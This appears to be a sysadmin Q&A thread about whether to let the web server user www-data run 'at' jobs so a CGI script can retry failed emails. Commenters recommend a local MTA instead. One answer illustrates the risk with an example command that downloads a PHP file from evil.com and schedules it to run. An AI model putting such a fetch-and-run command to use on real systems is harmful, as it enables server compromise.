2

I have a cgi script that is resending an email on a failed attempt 5-10 minutes after a user accesses a page. My thought was to do this using the at command from a python call (os.system("at now + 5 minutes <<< ' python resend.py data'")). Testing revealed:

$ sudo su www-data
$ at now
You do not have permission to use at.
$

What sort of grief am I exposing myself to if I remove user 'www-data' from the /etc/at.deny file?

Jamie
  • 1,274
  • 7
  • 22
  • 39
  • What sort of reason do you have for ***wanting*** the `www-data` user to be able to submit `at` jobs? -- "resending an email" is not something one would normally do with `at`... – voretaq7 Nov 20 '13 at 18:27
  • @voretaq7 The bigger question really is 'How can I retry sending an email from cgi script?' At present, a CGI script sends an email, on occasion that fails and we have traverse the logs to look for failures. Submitting an `at` job on email failure would lessen our burden. – Jamie Nov 20 '13 at 18:45
  • 2
    That's not the CGI script's job -- You submit the email to your local MTA (which should really never fail. If it is fix *that* problem). If you're trying to deal with all the possible ways SMTP email can go wrong via your web application, ***don't***. Email isn't reliable message delivery, and you shouldn't try to hack it into being reliable. You're just going to go down the rabbit hole of nasty hacks and multi-layer special cases if you try. – voretaq7 Nov 20 '13 at 18:52
  • @voretaq7 Good advice. But I'm new to python and didn't see a simple MTA interface. I'll look further. – Jamie Nov 20 '13 at 18:56
  • 1
    http://docs.python.org/2/library/email-examples.html http://docs.python.org/2/library/smtplib.html http://stackoverflow.com/questions/73781/sending-mail-via-sendmail-from-python – Zoredache Nov 20 '13 at 19:31

1 Answers1

0

by making that proposed change, you are allowing the user apache runs as to execute jobs in the future, at a later time.... i dunno this is possible, but if you where able to subvert a webserver to execute serverside something like

exec("cd /tmp && wget http://evil.com/evil.php && at laterdate /tmp/evil.php")

this would exec that downloaded php script, at a later time.

its basically one time cron, and to be honest, i usually disable it, in favor of jenkins.

nandoP
  • 2,001
  • 14
  • 15
  • 1
    It is a one time `cron`. But I don't understand "i usually disable it, in favor of jenkins". What do you disable, and what is jenkins? – Jamie Nov 20 '13 at 18:13
  • @jamie, jenkins is the continuous integration solution to all the worlds problems – nandoP Nov 20 '13 at 18:14
  • But if the attacker would be able to get as far as to execute this I would say he could do the same amount of evil without using the `at` command...?! The only difference is that he can delay the evil.... it's evil regardless... – TheStoryCoder Jun 23 '17 at 10:13